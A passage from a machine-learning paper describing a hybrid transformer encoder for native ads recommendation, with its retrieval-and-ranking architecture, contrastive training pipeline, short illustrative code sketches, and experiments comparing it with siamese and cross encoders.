there is no interaction between the source and target's encoding processes. This may cause important information to be left out of the generated embeddings, which harms the model's accuracy. According to \cite{luan2020sparse}, the problem becomes more severe as the input sequence grows longer.
An intuitive way of addressing the above problem is to make use of the one-tower transformer encoder \cite{luan2020sparse}, usually referred to as a \textit{cross-encoder}, where the inputs are combined into one sequence and jointly processed by a unified encoding network. However, this architecture needs to encode every pair of inputs from scratch for comparison, whose running time is prohibitive for most realtime services, like native ads recommendation (where hundreds or even thousands of comparisons need to be made within milliseconds). Recently, increasing emphasis has been placed on how to acquire accurate matching results in a temporally efficient manner. One promising option is to establish the interaction between inputs on top of the transformer's hidden-states \cite{humeau2019poly,luan2020sparse}. For example, in \cite{humeau2019poly}, the hidden-states of the source sequence are mapped into a total of $K$ embeddings called context vectors; the context vectors are further aggregated w.r.t. the target embedding via attentive pooling; finally, the aggregation result is compared with the target embedding so as to reflect the source-target relevance. Our work also takes advantage of the hidden-states. Unlike the conventional methods, the interaction between inputs is established based on the raw hidden-states of the source and disentangled embeddings of the target, which turns out to be both efficient and more effective.
\section{Methodology}
\subsection{Preliminaries}\label{sec:met-pre}
Transformer encoding networks have proved to be a powerful tool for natural language understanding, significantly benefiting downstream tasks like recommendation and information retrieval. Such networks consist of multiple layers of transformer blocks \cite{vaswani2017attention}, which are built upon multi-head self-attention (MHSA). In each particular layer, the input embeddings (used as $Q$, $K$ and $V$) interact with each other via the following operations:
\begin{equation}
\begin{gathered}
\mathrm{MHSA}(Q, K, V) = \mathrm{Concat}(head_1,...,head_h)W^O, \\
head_i = \mathrm{Attention}(QW_i^Q, KW_i^K, VW_i^V).
\end{gathered}
\end{equation}
where $W^O$, $W_i^Q$, $W_i^K$, $W_i^V$ are the projection matrices to be learned. In transformers, the scaled dot-product attention is adopted, which computes the weighted-sum of $V$ with the following equation:
\begin{equation}
\mathrm{Attention}(Q, K, V) = \mathrm{softmax}(\frac{QK^T}{\sqrt{d}})V,
\end{equation}
where $d$ indicates the hidden dimension. Apparently, MHSA has the advantage of introducing long-range interactions within the input sequence, which brings stronger context-awareness to the generated representations.
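The two formulas above translate directly into a few lines of NumPy, as sketched below (single sequence, no masking or dropout; the toy dimensions in the test are arbitrary):

```python
import numpy as np

def attention(Q, K, V):
    # Scaled dot-product attention: softmax(Q K^T / sqrt(d)) V.
    d = Q.shape[-1]
    scores = Q @ K.T / np.sqrt(d)
    w = np.exp(scores - scores.max(axis=-1, keepdims=True))  # stable softmax
    w /= w.sum(axis=-1, keepdims=True)
    return w @ V

def mhsa(Q, K, V, WQs, WKs, WVs, WO):
    # head_i = Attention(Q W_i^Q, K W_i^K, V W_i^V); concat heads, project by W^O.
    heads = [attention(Q @ wq, K @ wk, V @ wv)
             for wq, wk, wv in zip(WQs, WKs, WVs)]
    return np.concatenate(heads, axis=-1) @ WO
```

In self-attention, one takes $Q=K=V=X$, the layer's input hidden-states.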
When applied to IR/recommendation-related tasks, transformer encoding networks usually adopt one of the following two forms: the siamese encoder and the cross encoder. In the following part, we will demonstrate how these forms of encoders are applied in the native ads recommendation scenario.
\subsubsection{Siamese Encoder} The siamese encoder leverages a pair of identical sub-networks to process the user history and the ad description, as shown in Figure \ref{fig:baseline} (A). Each sub-network aggregates the last layer's hidden states into the representation of its input sequence; as a result, two embeddings $E_{u}$ and $E_{a}$ are generated, which are of the same hidden dimension. The user-ad relevance is measured based on the similarity between the embeddings:
\begin{equation}
Rel(u, a) = \langle E_{u}, E_{a} \rangle,
\end{equation}
where $\langle \cdot \rangle$ stands for a similarity measurement, e.g., inner product. The advantage of the siamese encoder is that the user history and ad description can be encoded once and reused for relevance computation everywhere. More importantly, the generated embeddings can be indexed for ANN search (e.g., MIPS \cite{jegou2010product}), which naturally fits the needs of large-scale retrieval/recommendation. However, the siamese encoder is prone to information loss, as user and ad are encoded independently. Therefore, it usually suffers from inferior accuracy.
\begin{figure*}[t]
\centering
\includegraphics[width=0.85\textwidth]{Figures/hybrid.pdf}
\caption{Infrastructure of Hybrid Encoder. On the left and middle, the user embedding $E_u$ and ad embedding $E_a$ are generated independently; both embeddings are used for the ANN search in the retrieval step. On the middle and right, the disentangled ad embeddings $M_a$ are generated offline and used to attend the user's cached hidden-states for the ad-related user embeddings; both sets of embeddings are flattened into 1-D vectors and compared to measure the fine-grained user-ad relationship.}
\label{fig:hybrid}
\end{figure*}
\subsubsection{Cross Encoder} The cross encoder makes use of a unified transformer to analyze the relevance between the user and ad. In particular, the input sequences are concatenated into the following joint string marked with [CLS] and [SEP]:
\begin{equation}
[CLS]t_0^{user},...,t_M^{user}[SEP]t_0^{ad},...,t_N^{ad},
\end{equation}
where $t_{\cdot}^{user}$ and $t_{\cdot}^{ad}$ indicate tokens from the user's browsed web-pages and the ad description, respectively. The joint string is encoded by the transformer; based on the last layer's hidden-state corresponding to [CLS], denoted as $H_{[CLS]}$, the user-ad relevance is calculated as:
\begin{equation}\label{eq:cross}
Rel(user, ads) = \sigma(H_{[CLS]} W_A),
\end{equation}
where $W_A$ is the $d\times1$ linear projection vector for the output logit. The cross encoder has much higher model capacity than the siamese encoder, as user and ad can fully attend to each other within the encoding process. Therefore, the cross encoder can be much more accurate, as important information is preserved more effectively. However, it is highly limited in working efficiency, as every pair of user and ad needs to be encoded from scratch to find the most relevant result.
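A sketch of the cross encoder's input construction and scoring head may help; the transformer itself is stubbed out, and `h_cls` and `w_a` are toy stand-ins for $H_{[CLS]}$ and $W_A$ rather than real learned values:

```python
import math

def build_joint_input(user_tokens, ad_tokens):
    # [CLS] t_0^user ... t_M^user [SEP] t_0^ad ... t_N^ad
    return ["[CLS]"] + user_tokens + ["[SEP]"] + ad_tokens

def cross_relevance(h_cls, w_a):
    # Rel(user, ad) = sigmoid(H_[CLS] . W_A)
    logit = sum(h * w for h, w in zip(h_cls, w_a))
    return 1.0 / (1.0 + math.exp(-logit))
```

Because the joint input depends on both the user and the ad, every (user, ad) pair triggers a fresh encoding pass, which is the efficiency bottleneck discussed below.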
\subsection{Overview of Hybrid Encoder}
\subsubsection{Problem Formulation}
We consider the scenario where native ads are recommended based on the user's web-browsing behaviors. The following definition clarifies the objective of native ads recommendation (NAR).
\begin{definition}
(NAR) Given user's web-browsing history, NAR looks for the advertisement $a$, which gives rise to the maximum probability of being clicked.
\end{definition}
It is apparent that the NAR problem can be quantitatively expressed by the following optimization problem:
\begin{equation}
\max \mathbb{E}_{(u,a) \sim P(u,a)} \log \pi(a|u),
\end{equation}
where $P(u,a)$ stands for the joint probability that user $u$ clicks ad $a$, and $\pi(a|u)$ refers to the advertisement's probability of being recommended by NAR conditioned on the user's web-browsing history. By optimizing the above objective, the recommendation algorithm is expected to produce the maximum amount of ad-clicks, which contributes to the revenue growth of the whole market.
\subsubsection{Two-Stage Processing}\label{sec:met-ov-two} To facilitate efficient and precise native ads recommendation, a two-stage workflow is employed, which consists of the consecutive steps of retrieval and ranking. The retrieval step selects relevant candidate ads w.r.t. the presented user. Given that the whole advertisement set can be huge (usually as large as a few million), the retrieval step must be highly efficient; thus, approximate nearest neighbour (ANN) search is a natural choice. To make use of it, user history and ad description are independently encoded as $E_{u}$ and $E_{a}$, and the user-ad relevance is measured by the embedding similarity. As a result, the candidate ads of the retrieval step are efficiently obtained via ANN search:
\begin{equation}
\Omega_{retr} = \mathrm{ANN}(E_u, \{E_a|\Omega_A\})
\end{equation}
where $\{E_a|\Omega_A\}$ denotes the embeddings of the whole ad set $\Omega_A$. Following the retrieval step, the ranking step is carried out to select the best set of ads out of the coarse-grained candidates. For the sake of better recommendation quality, a ranking function $f(\cdot)$ is utilized, which is able to establish the interaction between the user and each of the candidate ads. Finally, the fine-grained set of ads for recommendation is determined based on the ranking scores:
\begin{equation}
\Omega_{rank} = \mathrm{Top}\text{-}K \{ f(u,a) | \Omega_{retr} \}
\end{equation}
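The two steps can be sketched as follows; the ANN call is replaced here by an exact brute-force top-$k$ inner-product search, and `f` stands for any pairwise ranking function (the function names are illustrative, not from the paper's code):

```python
def retrieve(e_u, ad_embs, k):
    """Top-k ads by inner product with the user embedding.

    ad_embs: dict mapping ad id -> embedding. A production system would
    use an ANN index here instead of this exact scan.
    """
    def score(emb):
        return sum(u * a for u, a in zip(e_u, emb))
    return sorted(ad_embs, key=lambda ad: -score(ad_embs[ad]))[:k]

def rank(user, candidates, f, top_k):
    # Re-score the coarse candidates with the fine-grained function f.
    return sorted(candidates, key=lambda ad: -f(user, ad))[:top_k]
```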
\subsubsection{Online Cost Analysis}\label{sec:met-ov-time} The running time of the above two-stage processing consists of three parts: the user and ad embedding generation, the ANN search, and the ranking of candidates. Because the in-market ads are temporally invariant and given beforehand, the ad embeddings can all be generated offline; besides, compared with the model's inference cost, the ANN search is fast and its time complexity is constant (or sub-linear). Therefore, the online cost is determined mainly by two factors: the \textit{generation of the user embedding} and \textit{the ranking of candidates}. The generation of the user embedding takes one pass of transformer encoding; and with the conventional cross encoder, it takes $|\Omega_{retr}|$ rounds of transformer encoding to rank the candidates. In total, there will be $|\Omega_{retr}|+1$ rounds of transformer encoding, which is temporally infeasible for native ads production. Apparently, the ranking step turns out to be the efficiency bottleneck of the two-stage workflow. In the following discussion, a significantly accelerated ranking operation will be introduced, whose time cost is reduced to $\epsilon$ transformer encodings ($\epsilon\leq1$). As a result, it merely takes $1+\epsilon$ transformer encodings, which makes the hybrid encoder competitive in working efficiency.
\subsection{Model Architecture}
The architecture of the hybrid encoder is shown in Figure \ref{fig:hybrid}, where multiple transformers are jointly deployed for the hybrid encoding process. On the left and middle of the model, the deployed transformers take the form of a siamese encoder, where the user and ad embeddings, $E_u$ and $E_a$, are generated independently. These embeddings are used for the ANN search of the retrieval step. On the middle and right, the disentangled ad embeddings $M_a$ are generated, which may capture the ad semantics more comprehensively; meanwhile, the disentangled ad embeddings attend to the cached hidden-states of the ua-interaction network, which gives rise to a total of $|M_a|$ ``ad-related'' user embeddings $M_u$. Finally, the disentangled ad embeddings and ad-related user embeddings are flattened into 1-D vectors and compared, which supports a fine-grained analysis of the user-ad relationship for the ranking step.
\subsubsection{User and Ad Embedding Generation}\label{sec:met-mod-sia}
The user's browsed web-pages and the ad's description are independently fed into the user embedding network and the ad embedding network. Unlike the default practice where the [CLS] token's hidden-state in the last layer is taken as the representation result, we use the mean-pooling of all tokens' hidden-states in the last layer as the user and ad embeddings, which is suggested to be more effective \cite{reimers2019sentence,lu2020twinbert}:
\begin{equation}
\begin{gathered}
E_u = \text{mean}(H^u), ~where~ H^u = \text{U-Net}(\text{user's browsed webs}); \\
E_a = \text{mean}(H^a), ~where~ H^a = \text{A-Net}(\text{ad description}).
\end{gathered}
\end{equation}
As the user and ad embeddings need to support the ANN search operation in the retrieval step, $E_u$ and $E_a$ must lie in the same latent space so that their similarity is directly comparable. As a result, the user-ad relevance for the retrieval step is computed as:
\begin{equation}\label{eq:siamese}
Rel_{retr}(u,a) = \langle E_u, E_a \rangle.
\end{equation}
In our implementation, we use inner-product as the similarity measure and adopt HNSW for the search of approximate neighbours.
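A sketch of the pooling and retrieval-time relevance; the encoder networks are stubbed out, and `hidden_states` stands in for the last-layer states $H^u$ or $H^a$:

```python
def mean_pool(hidden_states):
    # E = mean of all tokens' last-layer hidden states (Eq. above).
    n = len(hidden_states)
    d = len(hidden_states[0])
    return [sum(h[j] for h in hidden_states) / n for j in range(d)]

def rel_retr(e_u, e_a):
    # Inner-product similarity, the form directly indexable by an
    # ANN library such as HNSW.
    return sum(u * a for u, a in zip(e_u, e_a))
```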
\subsubsection{Fast Ranking with UA Interaction}
The interaction between user and ad is established via ua-interaction network, as shown on the right side of Figure \ref{fig:hybrid}. In this stage, the following three operations are carried out step-by-step. First of all, it generates $K$ disentangled ad embeddings $M_a$ with multi-head attention \cite{lin2017structured}:
\begin{equation}
\begin{gathered}
M_a : \{ M_a^i = \sum\nolimits_{H^a} \alpha^i_j H^a_j | i=1,...,K \}, \\
~ where ~ \boldsymbol{\alpha}^i = \text{softmax}(H^a, \boldsymbol{\theta}^i).
\end{gathered}
\end{equation}
In the above equation, $\{\boldsymbol{\theta}^i\}_1^K$ stands for the attention heads, which aggregate the hidden-states of the advertisement from different views for a more comprehensive representation. Secondly, each of the disentangled ad embeddings is used to attend the user's last-layer hidden-states $H^{ua}$ from the ua-interaction network. As a result, the following ad-related user embeddings $M_u$ are generated:
\begin{equation}
\begin{gathered}
M_u: \{ M_u^i = \sum\nolimits_{H^{ua}} \alpha^i_j H^{ua}_j | i=1,...,K \}, \\
~ where ~ \boldsymbol{\alpha}^i = \text{softmax}(H^{ua}, M_a^i).
\end{gathered}
\end{equation}
Finally, the disentangled ad embeddings $M_a$ and the ad-related user embeddings $M_u$ are flattened and concatenated into 1-D vectors, whose similarity is used as the measurement of user-ad relevance for the ranking step:
\begin{equation}\label{eq:hybrid}
\begin{gathered}
Rel_{rank}(u,a) = \langle \bar{M}_u, \bar{M}_a \rangle, \\
where ~ \bar{M}_u = \text{cat}([M_u^1,...,M_u^K]), ~ \bar{M}_a = \text{cat}([M_a^1,...,M_a^K]).
\end{gathered}
\end{equation}
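The three operations can be sketched end-to-end as follows; `thetas` plays the role of the learned heads $\{\boldsymbol{\theta}^i\}_1^K$, and all vectors are toy values rather than real hidden states:

```python
import math

def softmax(xs):
    m = max(xs)
    exps = [math.exp(x - m) for x in xs]
    s = sum(exps)
    return [e / s for e in exps]

def attend(states, query):
    """Weighted sum of `states` with weights softmax(<state, query>)."""
    w = softmax([sum(s_j * q_j for s_j, q_j in zip(s, query))
                 for s in states])
    d = len(states[0])
    return [sum(wi * s[j] for wi, s in zip(w, states)) for j in range(d)]

def rel_rank(h_ua, h_a, thetas):
    m_a = [attend(h_a, th) for th in thetas]   # disentangled ad embeddings
    m_u = [attend(h_ua, ma) for ma in m_a]     # ad-related user embeddings
    flat_a = [x for vec in m_a for x in vec]   # concatenate into 1-D
    flat_u = [x for vec in m_u for x in vec]
    return sum(u * a for u, a in zip(flat_u, flat_a))
```

Note that only `attend(h_ua, ...)` touches the user side, reflecting the uni-directional interaction discussed in the remarks.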
$\bullet$ \textbf{Remarks}. Compared with the expensive cross-encoding process, there are two notable characteristics of the proposed ua-interaction: 1) the interaction is uni-directional: only the user's hidden-states are attended by the representation of the ad; and 2) the interaction is introduced not from the very bottom, but at the last layer of the transformer. Despite its simplicity, the proposed method is desirable from the following perspectives.
First of all, it leverages the pre-computation result (i.e., the disentangled ad embeddings) and the cached hidden-states (from the ua-interaction network) to establish interaction between user and ad. Therefore, it merely incurs one pass of feed-forward inference of the ua-interaction network. Besides, it is empirically found that a relatively small-scale network (compared with the user embedding network) may already be sufficient for making high-quality interaction. Therefore, it only brings about $\epsilon$ ($\epsilon\leq1$) of the transformer encoding cost of user embedding generation, which makes the ranking step highly competitive in time efficiency.
Secondly, the proposed ua-interaction is more effective in preserving the underlying information of user and ad. On the one hand, ad descriptions are usually simple and compact; even without being interacted with by the user, the disentangled embeddings may still comprehensively represent the advertisement. On the other hand, although the user history can be complicated, the necessary information for measuring the user-ad relationship is fully extracted when attended by the disentangled ad embeddings. As a result, the relevance between user and ad is measured more precisely based on such informative embeddings, which significantly benefits the identification of the best candidates.
\begin{figure}[t]
\centering
\includegraphics[width=1.0\linewidth]{Figures/train.pdf}
\caption{Illustration of the progressive training pipeline, where the blue and red dots indicate the user embedding and the ground-truth ad embedding, while the green triangles stand for the irrelevant ad embeddings. In the 1st stage, the global contrast learning discriminates the ground-truth from the global negatives, which leads to a relatively coarse-grained scope of candidates (the yellow region); in the 2nd stage, the local contrast learning identifies the ground-truth within the candidate scope, which pushes the user embedding even closer to the ground-truth ad embedding.}
\label{fig:train}
\end{figure}
\subsection{Progressive Training Pipeline}\label{sec:met-pro}
Hybrid encoder is trained progressively with two consecutive steps (as in Figure \ref{fig:train}). Firstly, the \textit{global contrast learning} is carried out for the user and ad embedding networks; in this step, the model learns to discriminate the ground-truth ad from the global negatives. As a result, the ground-truth is confined within the neighbourhood of the user embedding, where it can be retrieved via ANN search. Secondly, the \textit{local contrast learning} is performed for the ua-interaction network, where the model continues to learn the selection of the ground-truth from the presented candidates. With this operation, the user and ad representations (more specifically, the flattened ad-related user embeddings and disentangled ad embeddings) are further pushed together, which improves the recommendation accuracy of the ranking step.
\subsubsection{Global Contrast Learning} The global contrast learning is carried out in the form of binary classification. Firstly, a positive user-ad case $(u,a)$ is sampled from the production log; then, a total of $n$ negative ads $\{a'_i\}_n$ are sampled from the global ad corpus $A$. As a result, the following training objective is formulated:
\begin{equation}
\begin{gathered}
\mathrm{E}_{(u,a)\sim P(u,a)} \Big( \log\big(\sigma(u,a)\big) - \sum\nolimits_{\{a'_i\}_n \sim A} \log\big(\sigma(u,a'_i)\big) \Big), \\
~ where ~ \sigma(u,a) = \text{exp}\big(Rel_{retr}(u,a)\big).
\end{gathered}
\end{equation}
With the optimization of the above objective, the user and ground-truth ad embeddings will come close towards each other; meanwhile, the global negatives' embeddings will be pushed away from the user embedding. Therefore, it enables the retrieval step to find out relevant candidate ads via ANN search.
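Since $\sigma(u,a)=\exp\big(Rel_{retr}(u,a)\big)$, the inner term $\log\sigma(u,a)$ reduces to the relevance itself, so the objective pushes the positive pair's relevance up and the sampled negatives' relevance down. A toy evaluation of this quantity for one positive pair and its negatives (the embeddings are stand-ins, and in practice the objective is maximized per mini-batch with gradient descent):

```python
def rel(e_u, e_a):
    # Inner-product relevance, as in the retrieval step.
    return sum(u * a for u, a in zip(e_u, e_a))

def global_contrast(e_u, e_pos, e_negs):
    # log sigma(u, a) - sum_i log sigma(u, a'_i), with sigma = exp(Rel),
    # which simplifies to Rel(u, a) - sum_i Rel(u, a'_i).
    return rel(e_u, e_pos) - sum(rel(e_u, e_n) for e_n in e_negs)
```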
\subsubsection{Local Contrast Learning}\label{sec:met:lcl} The local contrast learning is performed w.r.t. the well-trained retrieval strategy. For each positive $(u,a)$ sample, the negative cases are sampled within the scope of candidates, i.e., the neighbourhood of the user embedding $E_u$: $\text{N}(E_u)$, based on which the training objective is formulated as follows:
\begin{equation}
\begin{gathered}
\mathrm{E}_{(u,a)\sim P(u,a)} \Big( \log\big(\sigma(u,a)\big) - \sum\nolimits_{\{a'_i\}_n \sim \text{N}(E_u)} \log\big(\sigma(u,a'_i)\big) \Big), \\
~ where ~ \sigma(u,a) = \text{exp}\big(Rel_{rank}(u,a)\big).
\end{gathered}
\end{equation}
Notice that $\text{N}(E_u)$ does not necessarily mean the nearest neighbours of $E_u$. In fact, it is empirically found that using the nearest neighbours leads to inferior training outcomes, for two underlying reasons: firstly, the nearest neighbours give rise to a high risk of false negatives, i.e., sampled ads that are non-clicked but relevant to the user; secondly, the nearest neighbours can be monotonous, i.e., the sampled negatives are probably associated with similar semantics, thus reducing the information that can be learned from the negative samples. In our implementation, we first collect a large number of neighbours of $E_u$, and then randomly sample a handful of them as the training negatives.
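The sampling scheme above can be sketched as follows; the neighbour pool is built here with an exact inner-product sort as a stand-in for ANN search, and all names are illustrative:

```python
import random

def sample_negatives(e_u, ad_embs, pool_size, n_neg, rng=random):
    """Draw n_neg random negatives from a large neighbour pool of e_u.

    Sampling randomly from a *large* pool (rather than taking the very
    nearest neighbours) mitigates both the false-negative risk and the
    monotony of near-duplicate negatives.
    """
    pool = sorted(ad_embs,
                  key=lambda e: -sum(u * a for u, a in zip(e_u, e)))
    return rng.sample(pool[:pool_size], n_neg)
```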
\section{Experimental Studies}
\begin{table}[t]
\centering
\includegraphics[width=1.05\linewidth]{Figures/data.pdf}
\caption{Specs about the datasets. \#Train/Valid/Test: number of samples in train/valid/test set; \#Query: number of input queries (ads: \#user, news: \#headline); \#Target: number of recommendation targets (ads: \#ad, news: \#annotation).}
\label{tab:data}
\end{table}
\begin{table*}[t]
\centering
\includegraphics[width=0.95\textwidth]{Figures/basic.pdf}
\caption{Basic Comparison \cref{sec:exp-ana-bas}, I. \& II.: results on Native Ads and Google News, respectively. The hybrid encoder outperforms the siamese encoder on both datasets, and it generates comparable performance as the cross encoder on Native Ads dataset.}
\label{tab:basic}
\end{table*}
\begin{table*}[t]
\centering
\includegraphics[width=0.95\textwidth]{Figures/time.pdf}
\caption{Hit-Time Ratio Analysis \cref{sec:exp-ana-tim} (time measured in ms). The hybrid encoder achieves comparable performance as the cross encoder, but it merely incurs small additional cost compared with the siamese encoder.}
\label{tab:time}
\end{table*}
\subsection{Experiment Settings}
The settings about the experimental studies are specified as follows.
$\bullet$ \textbf{Datasets.} The experimental studies are carried out based on production data collected from Microsoft Audience Ads platform\footnote{https://about.ads.microsoft.com/en-us/solutions/microsoft-audience-network/microsoft-audience-ads}. The dataset is composed of large-scale user-ad pairs, in which users are characterized by their web-browsing behaviors, and web-pages/advertisements are associated with their textual descriptions. As discussed in the methodology, the recommendation algorithms are required to predict user's next-clicked ad based on her web-browsing behavior. The training, validation and testing sets are strictly partitioned in time
in order to avoid data leakage: the training data is from 2020-05-01 to 2020-05-31, while the validation/testing data is from 2020-07-14 to 2020-08-11. The detailed specifications about the dataset are illustrated with Table \ref{tab:data}.
Although the proposed method is designed for native ads recommendation, it is also necessary to explore its performance in more general scenarios, where semantically close targets are selected for the input query from a large-scale corpus. To this end, the Google News dataset\footnote{https://github.com/google-research-datasets/NewSHead} is adopted for further evaluation. This dataset contains the headlines of news articles (parsed from the provided urls) and their human-annotated descriptions, e.g., news headline ``\textit{nba playoffs 2019 milwaukee bucks vs toronto raptors conference finals schedule}'' and human annotation ``\textit{NBA playoff Finals}''. In our experiment, the news headline is used as the input query, for which the related human annotation needs to be selected from the whole annotation corpus. The training and validation/testing set partition is consistent with \cite{headline2020}, where the dataset was originally created.
$\bullet$ \textbf{Baselines}. As discussed, the hybrid encoder is compared with the two representative forms of transformer encoding networks \cite{luan2020sparse}. One is the \underline{siamese encoder}, which is the conventional way of making use of transformers for native ads recommendation \cite{lu2020twinbert}; as the hybrid encoder already includes a siamese component, we directly take that part out of the well-trained hybrid encoder for testing, such that the impact of inconsistent settings can be excluded. The other is the \underline{cross encoder}, which is the most accurate but temporally infeasible; the cross encoder is also learned through the same training workflow as the hybrid encoder's ranking component \cref{sec:met:lcl}, thus we can fairly compare the effect of model architecture. The computation of user-ad relevance with both encoders is consistent with the previous introduction made in \cref{sec:met-mod-sia} and \cref{sec:met-pre}. In our experiments, we adopt \underline{BERT-base} \cite{devlin2018bert}, the 12-layer-768-dim bi-directional pretrained transformer, as our backbone structure. Besides, as BERT-base is still too large-scale a model for realtime service, another model based on a lightweight 2-layer-128-dim \underline{distilled BERT} is trained for production usage.
$\bullet$ \textbf{Performance Evaluation}. The quality of native ads recommendation is evaluated in terms of \underline{Hit@N}, which reflects how likely the ground-truth ad is to be included within the top-N recommendation. To focus on the effect of each model itself, the top-N recommendation is made based on the same two-stage workflow as discussed in \cref{sec:met-ov-two}, where a shared set of candidate ads (a total of $k$N, which equals 100 by default) is provided by approximate nearest neighbour search. As introduced in \cref{sec:met-mod-sia}, the ANN search is performed with HNSW\footnote{https://github.com/nmslib/hnswlib}, where the embedding similarity is measured in terms of inner product. With the shared candidate set, the siamese encoder, cross encoder and hybrid encoder generate their recommendation results based on the ranking scores calculated with Eq.~\ref{eq:siamese}, \ref{eq:cross} and \ref{eq:hybrid}, respectively.
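For reference, Hit@N over a test set is simply the fraction of cases whose ground-truth appears in the top-N list; a minimal sketch (variable names are illustrative):

```python
def hit_at_n(recommendations, ground_truths, n):
    """Fraction of test cases whose ground-truth ad is in the top-n list.

    recommendations: one ranked list of ad ids per test case.
    ground_truths: the clicked ad id for each test case.
    """
    hits = sum(1 for recs, gt in zip(recommendations, ground_truths)
               if gt in recs[:n])
    return hits / len(ground_truths)
```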
$\bullet$ \textbf{System Settings}. All the models are implemented based on PyTorch 1.6.0 and Python 3.6.9, and trained on Nvidia V100 GPU clusters. The time cost is tested with a CPU machine (Intel(R) Xeon(R) CPU E5-2690 v4 @ 2.60GHz, with 112 GB MEM), which is consistent with the production environment\footnote{GPU inference is not feasible in production environment due to factors like huge online traffic, and the requirement of realtime service (user's request must be processed right away instead of being buffered and processed periodically)}.
\subsection{Experiment Analysis}
\subsubsection{Basic Comparison}\label{sec:exp-ana-bas} In the basic comparison, a total of 100 candidate ads are first generated via ANN search; then each encoder makes the top-N recommendation based on its computation of user-ad relevance. The experimental results are reported in Table \ref{tab:basic}, where both datasets and both types of backbone networks are included for comparison. It can be observed that the hybrid encoder outperforms the siamese encoder in all settings; and when used for native ads, it achieves comparable recommendation quality to the cross encoder. On the Google News dataset, the gaps between the hybrid encoder and the cross encoder are relatively larger, which may be attributed to the following reason. The Google News dataset has far fewer training instances than the native ads dataset; as a result, the model's performance could be limited by insufficient training. However, the cross encoder can be more robust to this adverse situation because it utilizes data with higher efficiency. Specifically, as the input query and target are jointly encoded from the bottom up, it becomes easier to figure out their underlying relevance; therefore, the model learns more quickly and is less affected by data sparsity. To verify the above analysis, additional experiments are carried out in which models are trained with less data on the native ads dataset (with 1/3 of the original training data). It is found that the cross encoder's performance becomes ``Hit@1:0.1054, Hit@3:0.2397'', while the hybrid encoder's performance becomes ``Hit@1:0.0891, Hit@3:0.2089'' (comprehensive results are included in Table \ref{tab:partial} in the Appendix). In other words, the cross encoder is less affected, which further confirms our previous analysis. More discussion about the relationship between both encoders is made in \cref{sec:exp-ana-pro}.
\begin{table}[t]
\centering
\includegraphics[width=1.05\linewidth]{Figures/asym.pdf}
\caption{Asymmetric Model Deployment \cref{sec:exp-ana-fr}. The light-weighted ua-interaction network leads to very limited loss in recommendation quality.}
\label{tab:asym}
\end{table}
\begin{table}[t]
\centering
\includegraphics[width=1.05\linewidth]{Figures/progress.pdf}
\caption{Progressive Training \cref{sec:exp-ana-pro}. The progressive training significantly improves hybrid encoder's performance.}
\label{tab:progress}
\end{table}
\subsubsection{Hit-Time Ratio}\label{sec:exp-ana-tim} More detailed performance analysis is made for the model trained for real-world production (i.e., the one based on distilled BERT). Particularly, the top-1 recommendation quality is measured with varying numbers of candidate ads from ANN search, together with the inference time needed to process a single user. (In the previous experiment, the number of candidates is set to 100 regardless of time cost; but in production, the model is strictly required to work on a millisecond scale.) As shown in Table \ref{tab:time}, the hybrid encoder merely incurs limited additional cost compared with the siamese encoder, while improving the recommendation quality by a large margin. As discussed in \cref{sec:met-ov-time}, the siamese encoder takes one transformer encoding to serve each user, while the hybrid encoder merely introduces another $\epsilon$ passes of feed-forward inference ($\epsilon=1$ for this experiment, as the ua-interaction network and the user embedding network are of the same size). In reality, the increase in running time is even smaller, as the inference of the user embedding network and the ua-interaction network can be invoked simultaneously. In contrast, the cross encoder is far more expensive, as the user needs to be encoded from scratch with each of the candidate ads. (Although in the experiment environment the encoding process can be run in parallel given a sufficient number of machines, this is not realistic in production, as the online traffic is tremendous.) It can be observed that the cross encoder's running time grows rapidly and soon exceeds 10 ms, which is a default threshold for many realtime services, like native ads recommendation. Despite the expensive running cost, the performance gain from the cross encoder is very limited: similar to the observation in \cref{sec:exp-ana-bas}, the hybrid encoder's and cross encoder's performances are quite close to each other in most of the settings.
\subsubsection{Asymmetric Model Deployment}\label{sec:exp-ana-fr} Recalling that the hybrid encoder's working efficiency can be further improved if a smaller-scale ua-interaction network is utilized (which makes $\epsilon$ lower than 1), we further test the model's performance with the ua-interaction network and the user/ad embedding network deployed asymmetrically. In particular, for the user/ad embedding network with BERT-base (12-layer), the ua-interaction network is switched to a smaller 2-layer transformer; for the user/ad embedding network with distilled BERT (2-layer), the ua-interaction network is built on a single-layer transformer (the hidden dimensions stay the same). The experiment results are demonstrated in Table \ref{tab:asym}. Although the ua-interaction network's scale is reduced significantly, the loss in quality is relatively small, especially when a large number of ads are recommended (Top-20). The underlying reasons are twofold. Firstly, the disentangled ad embeddings are pre-computed with the same network, so their quality remains the same. Secondly, although the ua-interaction network is simplified, the user's information for analyzing user-ad relevance may still be effectively extracted thanks to its being attended by the ad.
\subsubsection{Progressive Learning}\label{sec:exp-ana-pro} An ablation study is made to evaluate the progressive training's effect on native ads recommendation \cref{sec:met-pro}. The experiment results are demonstrated in Table \ref{tab:progress}, where * means that the model is trained only with the global contrast learning. It can be observed that the hybrid encoder's performance is improved significantly when the progressive training is utilized. We further compare the progressive training pipeline's effect on the cross encoder, and find that the cross encoder's performance may also benefit from it; e.g., on the native ads dataset with the BERT-base backbone, the performance is improved from ``Hit@1:0.0965, Hit@3:0.2178'' to ``Hit@1:0.1111, Hit@3:0.2497'' (more results are included in Table \ref{tab:progress-a} in the Appendix). However, the improvement is not as significant as for the hybrid encoder, and such a phenomenon may still result from the cross encoder's higher data efficiency in learning user-ad relevance, as discussed in \cref{sec:exp-ana-bas}. These observations do not conflict with our basic argument; in fact, the cross encoder is always more capable of making fine-grained predictions, while the hybrid encoder may get very close to the cross encoder's performance if it is trained properly and sufficiently.
\subsubsection{Degree of Disentanglement}\label{sec:exp-ana-deg} The impact of the disentanglement degree (i.e., the number of disentangled ad embeddings to be generated) on native ads recommendation is also studied. The experiment results are demonstrated in Table \ref{tab:degree}, where hybrid$^i$ means that the degree is set to $i$. It can be observed that the best performance is achieved at degree 1 and degree 3 when the backbone structure is BERT-base (12-layer-768-dim) and distilled BERT (2-layer-128-dim), respectively. Meanwhile, further increasing the disentanglement degree does not help the model's performance. Such a phenomenon indicates that a large-scale model (e.g., BERT-base) may fully represent the ad's information with one single high-dimensional vector; and when the model's scale is reduced (e.g., distilled BERT), it may require a few more vectors to fully extract the ad's information. Because of the simplicity of ad descriptions (usually a short sequence of keywords indicating one particular product or service), a small disentanglement degree will probably be sufficient in practice.
\subsubsection{Summary} The major findings of the experimental studies are summarized as follows.
\\
$\bullet$ The hybrid encoder significantly outperforms the siamese encoder with little additional cost; besides, it achieves comparable recommendation quality as the cross encoder, but works with much higher efficiency.
\\
